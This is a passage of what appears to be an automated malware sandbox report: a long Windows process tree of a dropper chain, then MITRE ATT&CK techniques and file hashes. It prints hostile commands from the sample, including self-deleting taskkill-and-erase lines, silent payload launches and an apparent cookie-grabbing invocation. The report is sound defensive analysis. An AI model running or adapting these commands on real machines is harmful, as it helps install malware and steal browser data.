                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                        PID:6632
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\xnLlH93CjRbULjTcyt4LEvJA.exe
                                                                                                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                          PID:5440
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Fmn52HP3sJHmKRSh3ncs3DDW.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Fmn52HP3sJHmKRSh3ncs3DDW.exe"
                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                          PID:6780
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WxArxYe26SCJxyGcro5jPrhv.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WxArxYe26SCJxyGcro5jPrhv.exe"
                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                            PID:6852
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SunLabsPlayer.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\SunLabsPlayer.exe" /S
                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                PID:6704
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc54A6.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                    PID:4692
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "1_4924807894722937236.exe" /f & erase "C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe" & exit
                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                  PID:4304
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                                                                                    taskkill /im "1_4924807894722937236.exe" /f
                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                    PID:5656
                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe
                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe"
                                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                                  PID:4884
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                      PID:7116
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                        PID:4820
                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe
                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe"
                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                      PID:1548
                                                                                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                          PID:5160
                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe
                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe"
                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                          PID:4988
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\2096741.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\2096741.exe"
                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                              PID:6308
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4277866.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4277866.exe"
                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                PID:6556
                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                                                                                                                                                  "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                    PID:6540
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3667171.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3667171.exe"
                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                    PID:5176
                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                                    PID:4952
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-O74OA.tmp\LabPicV3.tmp
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-O74OA.tmp\LabPicV3.tmp" /SL5="$603CA,506127,422400,C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                        PID:5544
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-PIRGU.tmp\3316505.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-PIRGU.tmp\3316505.exe" /S /UID=lab214
                                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                                            PID:7012
                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\7-Zip\UWJXNSJIGJ\prolab.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\7-Zip\UWJXNSJIGJ\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                PID:6104
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-V53SU.tmp\prolab.tmp
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-V53SU.tmp\prolab.tmp" /SL5="$3029E,575243,216576,C:\Program Files\7-Zip\UWJXNSJIGJ\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5060
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\d4-0cd41-dc5-5bf87-ed8c3efb3f34e\Dytishejona.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\d4-0cd41-dc5-5bf87-ed8c3efb3f34e\Dytishejona.exe"
                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5080
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\25-0df6f-380-95c82-73ead556bd772\Juhyqunaeju.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\25-0df6f-380-95c82-73ead556bd772\Juhyqunaeju.exe"
                                                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5224
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mxxz3xd0.mv2\sskiper.exe /s & exit
                                                                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                                                                          PID:7828
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\mxxz3xd0.mv2\sskiper.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\mxxz3xd0.mv2\sskiper.exe /s
                                                                                                                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1540
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yk30r4qq.xef\KiffMainE1.exe & exit
                                                                                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                                                                                              PID:6520
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\yk30r4qq.xef\KiffMainE1.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\yk30r4qq.xef\KiffMainE1.exe
                                                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:7288
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l2iv31er.dei\001.exe & exit
                                                                                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5036
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\l2iv31er.dei\001.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\l2iv31er.dei\001.exe
                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:7196
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\upna3reh.0qp\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:7964
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\upna3reh.0qp\installer.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\upna3reh.0qp\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:7688
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ecvoz1xg.y4a\gpooe.exe & exit
                                                                                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:6648
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ecvoz1xg.y4a\gpooe.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\ecvoz1xg.y4a\gpooe.exe
                                                                                                                                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5752
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:4940
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7172
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vjrm3voz.nun\sskiper.exe /s & exit
                                                                                                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:5148
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vjrm3voz.nun\sskiper.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\vjrm3voz.nun\sskiper.exe /s
                                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5892
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uj05sxp0.jmc\google-game.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:7084
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\uj05sxp0.jmc\google-game.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\uj05sxp0.jmc\google-game.exe
                                                                                                                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5116
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czc03drs.uh3\askinstall39.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:6028
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\czc03drs.uh3\askinstall39.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\czc03drs.uh3\askinstall39.exe
                                                                                                                                                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:6868
                                                                                                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                    PID:1136
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                      PID:5336
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                    PID:2160
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                    PID:4204
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                    PID:4956
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4236
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                      PID:4948
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding C2FAC41FA0B5F166F17F0974EBEFFB18 C
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                        PID:5108
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding C3216AD2F88C1BC2611C813E811BC256
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5168
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                            PID:5548
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 3F137C3C22884828F1CAEF5ED3F12B15 E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:2416
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8C22.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\8C22.exe
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:7208

                                                                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                          T1130

                                                                                                                                                                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                                                                                                                                                                          Software Discovery

                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                          T1518

                                                                                                                                                                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                          5
                                                                                                                                                                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                          T1120

                                                                                                                                                                                                                                                                                                                                                                          Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                          T1018

                                                                                                                                                                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                                                                                                                                                                          Web Service

                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                          T1102

                                                                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Uninstall Information\LEYKCSNNHM\ultramediaburner.exe
                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Uninstall Information\LEYKCSNNHM\ultramediaburner.exe
                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4
                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                            9bd290c73c295139470b5a56f8d857bb

                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                            c838907b18895bc98a601e27c30b5de9acef88e7

                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                            bfc8f14e57e8fe77f10ec2c420b746a75291c034dd872bc673e459ebfdac5968

                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                            c8a77182ce1832fe96f35a2816120c9df00eca1aa29dce49a111f057d3583b3b25a69c88f579cc84f4ff43fbf17f663a1e07234aacdd1831bbdb443f8f234e36

                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                            e8f9ee1acf0775666bd07aba781e96bc

                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                            24bd2847a41293057f07d97f91fe375848aa70f3

                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                            58ce03a252b823a3e76d8b3f7bd8b0f11d0ee879a48064f8cec6039185f637e3

                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                            a9fc40ee024158c9c0a66b6fc298bdc2d7d67606610af66506ad7b907332aaf3dd680d342303ebc1977700266c440417d06ef752b6300b3e3e86913403c6fd9e

                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B76882588198CE25BFE5B7B047D867A1
                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                            f9d1e5ffc4b7909705704d94aa6a87fe

                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                            dd1102b19254b0f112316e3708bb845cf01adbb5

                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                            5e05fcd35205a64455a4fe0cb1f026d2a7e335f64d856b094c20ea805bf4d090

                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                            e2b5bb12c4f08538c297713f3bea8f98061d9b76ec855cd2501883262329b37f6c5935de16804b7ff78d1ed2a3ac3055cad7a30410b7fba6df67f6f3e533c804

                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                                                                                                                                                                                                                                                                            MD5

